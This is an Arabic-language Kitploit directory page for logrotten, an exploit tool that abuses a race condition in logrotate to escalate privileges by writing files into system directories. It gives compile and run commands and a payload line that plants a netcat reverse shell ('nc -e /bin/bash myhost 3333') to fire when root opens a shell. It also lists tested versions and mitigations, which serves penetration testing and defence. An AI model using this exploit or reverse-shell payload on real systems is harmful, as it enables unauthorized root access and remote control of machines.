Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
logrotten — استغلال حالة سباق في Logrotate يتيح تصعيد الامتيازات عبر كتابة ملفات تعسفية، مثل حمولات الصدفة العكسية، في أدلة النظام. | Kitploit
أدوات/GitHubGitHub/whotwagner/logrotten
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالاختبار الاختراقالفريق الأحمراستغلال الملفات الثنائية
GitHubwhotwagner/logrotten

logrotten

استغلال حالة سباق في Logrotate يتيح تصعيد الامتيازات عبر كتابة ملفات تعسفية، مثل حمولات الصدفة العكسية، في أدلة النظام.

عرض المستودع
211263منذ 8 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

[!WARNING]
تم نقل هذا المستودع إلى https://codeberg.org/whotwagner/logrotten. يرجى زيارة الموقع الجديد للحصول على أحدث التحديثات.

استغلال حالة سباق في logrotate لرفع الامتيازات

شعار Logrotten

وصف موجز

  • logrotate معرّض لحالة سباق بعد إعادة تسمية ملف السجل.
  • إذا تم تنفيذ logrotate بصلاحيات الجذر، مع خيار ينشئ ملفًا (مثل create أو copy أو compress وما إلى ذلك) وكان المستخدم يتحكم في مسار ملف السجل، فمن الممكن استغلال حالة السباق لكتابة ملفات في أي أدلة.
  • يمكن للمهاجم رفع امتيازاته بكتابة قذائف عكسية في أدلة مثل "/etc/bash_completition.d/".

المتطلبات المسبقة لرفع الامتيازات

  • يجب تنفيذ Logrotate بصلاحيات الجذر
  • يجب أن يكون مسار السجل تحت سيطرة المهاجم
  • يجب تعيين أي خيار ينشئ ملفات في إعداد logrotate

الإصدارات المختبرة

  • Debian GNU/Linux 11 (bullseye)
  • Debian GNU/Linux 9.5 (stretch)
  • Amazon Linux 2 AMI (HVM)
  • Ubuntu 18.04.1
  • logrotate 3.8.6
  • logrotate 3.11.0
  • logrotate 3.15.0
  • logrotate 3.18.0

التجميع

root@kitploit:~
gcc -o logrotten logrotten.c

تجهيز الحمولة

root@kitploit:~
echo "if [ `id -u` -eq 0 ]; then (/bin/nc -e /bin/bash myhost 3333 &); fi" > payloadfile

تشغيل الاستغلال

إذا تم تعيين خيار "create" في logrotate.cfg:

root@kitploit:~
./logrotten -p ./payloadfile /tmp/log/pwnme.log

إذا تم تعيين خيار "compress" في logrotate.cfg:

root@kitploit:~
./logrotten -p ./payloadfile -c -s 4 /tmp/log/pwnme.log

المشاكل المعروفة

  • كان من الصعب الفوز بالسباق داخل حاوية docker أو على lvm2-volume. هذا الإصدار من logrotten يحسّن الموثوقية.

التخفيف

  • تأكد من أن مسار السجل مملوك للجذر
  • استخدم الخيار "su" في logrotate.cfg
  • استخدم selinux أو apparmor

المؤلف

  • Wolfgang Hotwagner

المراجع

  • https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
  • https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges
  • https://github.com/whotwagner/logrotten
  • https://www.ait.ac.at/themen/cyber-security/ait-sa-20190930-01/
  • https://tech.feedyourhead.at/content/privilege-escalation-in-groonga-httpd
تنزيل الأداة